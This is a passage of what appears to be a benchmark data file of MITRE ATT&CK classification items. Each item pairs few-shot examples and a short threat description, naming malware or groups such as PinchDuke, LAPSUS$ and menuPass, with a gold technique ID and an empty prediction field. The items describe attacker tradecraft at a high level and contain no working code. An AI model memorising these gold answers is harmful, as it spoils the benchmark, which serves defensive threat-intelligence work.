multiple domains to facilitate payload staging and C2.\n\t - T1583.001: Acquire Infrastructure - Domains\n- Text: Gelsemium can use dynamic DNS domain names in C2.\n\t - T1568: Dynamic Resolution\n", + "input": "For Operation Dust Storm, the threat actors established email addresses to register domains for their operations.", + "gold": "- T1585.002: Establish Accounts - Email Accounts", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: DropBook has checked for the presence of Arabic language in the infected machine's settings.\n\t - T1082: System Information Discovery\n\t - T1614.001: System Location Discovery - System Language Discovery\n- Text: File hunting plugin: The most frequently used plugin, similar to one used in 2014. Often used to collect Office files from temporary internet history. Detailed survey plugin: Used to gather domain membership, processes/loaded modules, hardware enumeration, installed products, logical and mapped drive information. Evolution of earlier plugin used in 2014. Browser plugin: Used to steal browser history, stored passwords and sessions. File listing plugin: Works on local or remote drives and can map additional paths when given credentials\n\t - T1082: System Information Discovery\n\t - T1083: File and Directory Discovery\n- Text: Lucifer can crash a debugger by passing a format string to \"OutputDebugStringA()\".\n\t - T1497: Virtualization/Sandbox Evasion\n", + "input": "SynAck lists all the keyboard layouts installed on the victim\u2019s system using \"GetKeyboardLayoutList\" API and checks against a hardcoded language code list. If a match if found, SynAck sleeps for 300 seconds and then exits without encrypting files.", + "gold": "- T1614.001: System Location Discovery - System Language Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Backdoor.Pirpi also collects information about the target\u2019s local network, including the domain controller and workstations\n\t - T1016: System Network Configuration Discovery\n- Text: Magic Hound has created a user named `DefaultAccount` on compromised machines and assigned it to the Administrators and Remote Desktop Users groups.\n\t - T1136.001: Create Account - Local Account\n- Text: Operation Wocao has spawned a new \"cmd.exe\" process to execute commands.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n", + "input": "Bisonal can execute \"ipconfig\" on the victim\u2019s machine.", + "gold": "- T1016: System Network Configuration Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Fox Kitten has named binaries and configuration files svhost and dllhost respectively to appear legitimate.\n\t - T1036.005: Masquerading - Match Legitimate Name or Location\n- Text: Although the targeting profile is the same as the Russian banking cluster, the TTPs are very different. In particular, the use of tooling stands out from other clusters of CARBON SPIDER activity. As with other clusters, the primary infection vector is targeted spear phishing emails that use exploits for a variety of vulnerabilities in Microsoft Office:\n\t - T1203: Exploitation for Client Execution\n\t - T1588.006: Obtain Capabilities - Vulnerabilities\n\t - T1566: Phishing\n- Text: Shamoon creates a new service named \u201cntssrv\u201d that attempts to appear legitimate; the service's display name is \u201cMicrosoft Network Realtime Inspection Service\u201d and its description is \u201cHelps guard against time change attempts targeting known and newly discovered vulnerabilities in network time protocols.\u201d Newer versions create the \"MaintenaceSrv\" service, which misspells the word \"maintenance.\"\n\t - T1036.004: Masquerading - Masquerade Task or Service\n", + "input": "Starloader has masqueraded as legitimate software update packages such as Adobe Acrobat Reader and Intel.", + "gold": "- T1036.005: Masquerading - Match Legitimate Name or Location", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Clears Windows PowerShell and WitnessClientAdmin log file.\n\t - T1070.003: Indicator Removal - Clear Command History\n- Text: Operation Wocao has deleted Windows Event Logs to hinder forensic investigation.\n\t - T1070.001: Indicator Removal - Clear Windows Event Logs\n- Text: APT29 removed evidence of email export requests using \"Remove-MailboxExportRequest\".\n\t - T1070.008: Indicator Removal - Clear Mailbox Data\n", + "input": "menuPass has used Wevtutil to remove PowerShell execution logs.", + "gold": "- T1070.003: Indicator Removal - Clear Command History", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: A Volgmer variant is encoded using a simple XOR cipher.\n\t - T1027: Obfuscated Files or Information\n- Text: Some SUGARDUMP variants required a user to enable a macro within a malicious .xls file for execution.\n\t - T1204.002: User Execution - Malicious File\n- Text: Bandook is delivered via a malicious Word document inside a zip file.\n\t - T1566.001: Phishing - Spearphishing Attachment\n", + "input": "Mofang has compressed the ShimRat executable within malicious email attachments. Mofang has also encrypted payloads before they are downloaded to victims.", + "gold": "- T1027: Obfuscated Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Misdat is capable of running commands to obtain a list of files and directories, as well as enumerating logical drives.\n\t - T1083: File and Directory Discovery\n- Text: FLASHFLOOD searches for interesting files (either a default or customized set of file extensions) on removable media and copies them to a staging area. The default file types copied would include data copied to the drive by SPACESHIP.\n\t - T1025: Data from Removable Media\n- Text: AppleSeed has automatically collected data from USB drives, keystrokes, and screen images before exfiltration.\n\t - T1119: Automated Collection\n", + "input": "PinchDuke searches for files created within a certain timeframe and whose file extension matches a predefined list.", + "gold": "- T1083: File and Directory Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Some variants of use AppInit_DLLs to achieve persistence by creating the following Registry key: HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows \"AppInit_DLLs\"=\"pserver32.dll\"\n\t - T1546.010: Event Triggered Execution - AppInit DLLs\n- Text: 2. The macro decodes the dropped files using Windows certutil.exe (certutil.exe is a legitimate built-in command-line program to manage certificates in Windows). 3. The macro creates a copy of the files with their proper extensions using Extensible Storage Engine Utilities (esentutil.exe) (esentutil.exe is also a legitimate program that is pre-installed in Windows). The dropped files include the following: GUP.exe : GUP, a free (LGPL) Generic Updater. GUP is an open source binary used by Notepad++ for software updates\n\t - T1055.012: Process Injection - Process Hollowing\n\t - T1106: Native API\n\t - T1036: Masquerading\n\t - T1010: Application Window Discovery\n- Text: Wizard Spider has injected malicious DLLs into memory with read, write, and execute permissions.\n\t - T1055.001: Process Injection - Dynamic-link Library Injection\n", + "input": "PUNCHBUGGY can load a DLL using the LoadLibrary API.", + "gold": "- T1129: Shared Modules", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: This function is the supporting functionality for WinVNC. To allow the VNC session to connect, the current network socket WSAProtcol_Info structure is written to a named pipe prior to calling zxFunction001\n\t - T1021.005: Remote Services - VNC\n- Text: In this intrusion from December 2021, the threat actors utilized IcedID as the initial access vector. IcedID is a banking trojan that first appeared in 2017, usually, it is delivered via malspam campaigns and has been widely used as an initial access vector in multiple ransomware intrusions. Upon execution of\u2026 .\n\t - T1219: Remote Access Software\n- Text: During our investigation of one of the compromised servers we found an application that, at first glance, appeared to be a legitimate SSH server called Dropbear SSH\n\t - T1036: Masquerading\n\t - T1021: Remote Services\n", + "input": "Carberp can start a remote VNC session by downloading a new plugin.", + "gold": "- T1021.005: Remote Services - VNC", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT29 was able to get SUNBURST signed by SolarWinds code signing certificates by injecting the malware into the SolarWinds Orion software lifecycle.\n\t - T1553.002: Subvert Trust Controls - Code Signing\n- Text: BADNEWS is sometimes signed with an invalid Authenticode certificate in an apparent effort to make it look more legitimate.\n\t - T1036.001: Masquerading - Invalid Code Signature\n- Text: Stolen digital certificate re-use\n\t - T1588.004: Obtain Capabilities - Digital Certificates\n", + "input": "AppleJeus has used a valid digital signature from Sectigo to appear legitimate.", + "gold": "- T1553.002: Subvert Trust Controls - Code Signing", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: zwShell has been copied over network shares to move laterally.\n\t - T1021.002: Remote Services - SMB/Windows Admin Shares\n- Text: The actors used a compromised Office 365 service account with Global Administrator privileges to collect email from user inboxes.\n\t - T1078.002: Valid Accounts - Domain Accounts\n- Text: WannaCry attempts to copy itself to remote computers after gaining access via an SMB exploit.\n\t - T1570: Lateral Tool Transfer\n", + "input": "During Operation Wocao, threat actors used Impacket's smbexec.py as well as accessing the C$ and IPC$ shares to move laterally.", + "gold": "- T1021.002: Remote Services - SMB/Windows Admin Shares", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The only way to ensure that deleted files, as well as files that you encrypt with EFS, are safe from recovery is to use a secure delete application. Secure delete applications overwrite a deleted file's on-disk data using techniques that are shown to make disk data unrecoverable, even using recovery technology that can read patterns in magnetic media that reveal weakly deleted files. SDelete (Secure Delete) is such an application. Note that SDelete securely deletes file data, but not file names located in free disk space\n\t - T1070.004: Indicator Removal - File Deletion\n\t - T1485: Data Destruction\n- Text: No matching sample found for T1588\n- Text: We found malicious code injected into a JavaScript library provided by Volusion to their client shops. The injected code loaded another JavaScript stored on a Google Storage service. The loaded script is almost a direct copy of a normal JavaScript library but has a credit card skimmer carefully integrated. When customers submit their payment information, the skimmer will copy and send the personal information and credit card details to an exfiltration server belonging to the attackers\n\t - T1059.007: Command and Scripting Interpreter - JavaScript\n", + "input": "Xbash has destroyed Linux-based databases as part of its ransomware capabilities.", + "gold": "- T1485: Data Destruction", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Operation Wocao has staged archived files in a temporary directory prior to exfiltration.\n\t - T1074.001: Data Staged - Local Data Staging\n- Text: Agent.btz creates a file named thumb.dd on all USB flash drives connected to the victim. This file contains information about the infected system and activity logs.\n\t - T1052.001: Exfiltration Over Physical Medium - Exfiltration over USB\n- Text: DustySky can compress files via RAR while staging data to be exfiltrated.\n\t - T1560.001: Archive Collected Data - Archive via Utility\n", + "input": "Mustang Panda has stored collected credential files in \"c:\\windows\\temp\" prior to exfiltration. Mustang Panda has also stored documents for exfiltration in a hidden folder on USB drives.", + "gold": "- T1074.001: Data Staged - Local Data Staging", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Mimikatz performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from the SAM table.\n\t - T1003.002: OS Credential Dumping - Security Account Manager\n- Text: Threat Group-3390 actors have used gsecdump to dump credentials. They have also dumped credentials from domain controllers.\n\t - T1003.002: OS Credential Dumping - Security Account Manager\n\t - T1003.004: OS Credential Dumping - LSA Secrets\n- Text: PowerSploit contains a collection of Exfiltration modules that can harvest credentials using Mimikatz.\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n", + "input": "pwdump can be used to dump credentials from the SAM.", + "gold": "- T1003.002: OS Credential Dumping - Security Account Manager", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Given this extended period, it is logical to assume that some credentials obtained by the threat actor would be rotated during normal business operations. To combat this, the threat actor periodically \u201crefreshed\u201d their credential set by performing credential theft activities in an already compromised environment. At one victim, CrowdStrike identified multiple instances of domain credential theft months apart, each time with a different credential theft technique\n\t - T1589.001: Gather Victim Identity Information - Credentials\n- Text: The spear phishing emails and attached malicious macro documents typically have geopolitical themes\n\t - T1598.002: Phishing for Information - Spearphishing Attachment\n- Text: In June 2015, a number of web portal email accounts were hacked, sending emails with malicious Hangul document files and phishing emails to steal portal account credentials. In January 2016, a large number of emails with malicious attachments were sent under the guise of \u2018Office of National Security at the Blue House\u2019 to government research institutes. Analysis by related organizations identified the malicious attachment as Kimsuky malware [3\n\t - T1586.002: Compromise Accounts - Email Accounts\n", + "input": "Leviathan has collected compromised credentials to use for targeting efforts.", + "gold": "- T1589.001: Gather Victim Identity Information - Credentials", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Denis queries the Registry for keys and values.\n\t - T1012: Query Registry\n- Text: achieves persistence by creating a shortcut in the current user's Startup folder.\n\t - T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: FunnyDream has used a service named `WSearch` for execution.\n\t - T1036.004: Masquerading - Masquerade Task or Service\n", + "input": "DownPaper searches and reads the value of the Windows Update Registry Run key.", + "gold": "- T1012: Query Registry", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: OilRig has used compromised credentials to access other systems on a victim network.\n\t - T1078: Valid Accounts\n- Text: Chimera has used legitimate credentials to login to an external VPN, Citrix, SSH, and other remote services.\n\t - T1133: External Remote Services\n- Text: By performing two-factor authentication interception by receiving the OTP on their own telephone number, they gained access to the company network via the VPN. Our hypothesis is that they tested the 2FA-system first or selected the primary phone number to send a SMS to. Thus the 2FA code was sent with supporting Chinese text\n\t - T1111: Multi-Factor Authentication Interception\n", + "input": "LAPSUS$ has used compromised credentials and/or session tokens to gain access into a victim's VPN, VDI, RDP, and IAMs.", + "gold": "- T1078: Valid Accounts", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: has the capability to retrieve information about shares on remote hosts.\n\t - T1135: Network Share Discovery\n- Text: Cyclops Blink can use the Linux API `statvfs` to enumerate the current working directory.\n\t - T1083: File and Directory Discovery\n- Text: The first module downloaded by the GRIFFON malware to the victim\u2019s computer is an information-gathering JScript, which allows the cybercriminals to understand the context of the infected workstation. This module mainly relies on WMI and Windows objects to deliver results, which will be sent back to the operators\n\t - T1124: System Time Discovery\n\t - T1082: System Information Discovery\n\t - T1069.002: Permission Groups Discovery - Domain Groups\n", + "input": "BlackMould can enumerate local drives on a compromised host.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: BADNEWS Much of BADNEWS has remained consistent from when it was originally discussed by Forcepoint in August 2016. To briefly recap, the BADNEWS malware family acts as a backdoor, with communication occurring over HTTP. A number of commands are provided to the attackers, including the ability to download and execute additional information, upload documents of interest, and take screenshots of the desktop\n\t - T1102.001: Web Service - Dead Drop Resolver\n- Text: FIN7 gathers information on network shares.\n\t - T1039: Data from Network Shared Drive\n- Text: Caterpillar WebShell can obtain a list of user accounts from a victim's machine.\n\t - T1033: System Owner/User Discovery\n", + "input": "BADNEWS collects C2 information via a dead drop resolver.", + "gold": "- T1102.001: Web Service - Dead Drop Resolver", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Aria-body has the ability to collect data from USB devices.\n\t - T1025: Data from Removable Media\n- Text: APT29 has extracted files from compromised networks.\n\t - T1005: Data from Local System\n- Text: ccf32 can be used to automatically collect files from a compromised host.\n\t - T1119: Automated Collection\n", + "input": "PinchDuke collects user files from the compromised host based on predefined file extensions.", + "gold": "- T1005: Data from Local System", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: JCry has used VBS scripts.\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n- Text: menuPass executes commands using a command-line interface and reverse shell. The group has used a modified version of pentesting script wmiexec.vbs to execute commands. menuPass has used malicious macros embedded inside Office documents to execute files.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: The ProgramArguments tell us where GrowlHelper is installed and that it takes at least one command line argument (-f). The RunAtLoad key confirms the implant will run every time the user logs in. To get an overview of the installation process, we can monitor file system activity for GrowlHelper events\n\t - T1546.004: Event Triggered Execution - Unix Shell Configuration Modification\n", + "input": "Comnie executes VBS scripts.", + "gold": "- T1059.005: Command and Scripting Interpreter - Visual Basic", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: GoldMax has written AES-encrypted and Base64-encoded configuration files to disk.\n\t - T1027: Obfuscated Files or Information\n- Text: RDAT can also embed data within a BMP image prior to exfiltration.\n\t - T1027.003: Obfuscated Files or Information - Steganography\n- Text: Metamorfo has used VBS code on victims\u2019 systems.\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n", + "input": "Patchwork has obfuscated a script with Crypto Obfuscator.", + "gold": "- T1027: Obfuscated Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Exfiltration over control server channel: data is exfiltrated over the control server channel using a custom protocol - Commonly used port: the attackers used common ports such as port 443 for control server communications - Service execution: registers the implant as a service on the victim\u2019s machine - Automated collection: the implant automatically collects data about the victim and sends it to the control server - Data from local system: local system is discovered and data is gathered - Process discovery: implants can list processes running on the system - System time discovery: part of the data reconnaissance method, the system time is also sent to the control server - File deletion:: malware can wipe files indicated by the attacker\n\t - T1124: System Time Discovery\n\t - T1119: Automated Collection\n\t - T1041: Exfiltration Over C2 Channel\n- Text: can collect data from a local system.\n\t - T1005: Data from Local System\n- Text: AppleJeus has waited a specified time before downloading a second stage payload.\n\t - T1497.003: Virtualization/Sandbox Evasion - Time Based Evasion\n", + "input": "ccf32 can determine the local time on targeted machines.", + "gold": "- T1124: System Time Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Hildegard has used masscan to search for kubelets and the kubelet API for additional running containers.\n\t - T1613: Container and Resource Discovery\n- Text: Peirates can query the Kubernetes API for secrets.\n\t - T1552.007: Unsecured Credentials - Container API\n- Text: Siloscape can send kubectl commands to victim clusters through an IRC channel and can run kubectl locally to spread once within a victim cluster.\n\t - T1609: Container Administration Command\n", + "input": "Peirates can enumerate Kubernetes pods in a given namespace.", + "gold": "- T1613: Container and Resource Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Vasport is capable of tunneling though a proxy.\n\t - T1090: Proxy\n- Text: Duqu can be configured to have commands relayed over a peer-to-peer network of infected hosts if some of the hosts do not have Internet access.\n\t - T1090.001: Proxy - Internal Proxy\n- Text: In order to exfiltrate data from a network segment not connected to the Internet, the threat actor deployed a modified version of hTran. This \u2018connection bouncer\u2019 tool lets the threat actor redirect ports and connections between different networks and obfuscate C2 server traffic. There have been numerous reports of hTran being used by different Chinese threat actors, including: APT3, APT27 and DragonOK\n\t - T1090.002: Proxy - External Proxy\n", + "input": "PLEAD has the ability to proxy network communications.", + "gold": "- T1090: Proxy", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Mustang Panda has executed HTA files via cmd.exe, and used batch scripts for collection.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: can execute commands on victims.\n\t - T1059: Command and Scripting Interpreter\n- Text: Stop the service COMSysApp - Configure the service to autostart (to set up persistence on the system) - Modify registry keys to launch the DLL unser svchost.exe - Specify the malicious DLL path to be loaded into the svchost process. Immediately restart the service - Remove the batch files to reduce the fingerprint on the system\n\t - T1569.002: System Services - Service Execution\n\t - T1055: Process Injection\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n\t - T1070.004: Indicator Removal - File Deletion\n\t - T1112: Modify Registry\n", + "input": "Silence has used Windows command-line to run commands.", + "gold": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT29 can create new users through Azure AD.\n\t - T1136.003: Create Account - Cloud Account\n- Text: APT29 has granted `company administrator` privileges to a newly created service principal.\n\t - T1098.003: Account Manipulation - Additional Cloud Roles\n- Text: LockerGoga has been observed changing account passwords and logging off current users.\n\t - T1531: Account Access Removal\n", + "input": "LAPSUS$ has created global admin accounts in the targeted organization's cloud instances to gain persistence.", + "gold": "- T1136.003: Create Account - Cloud Account", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant 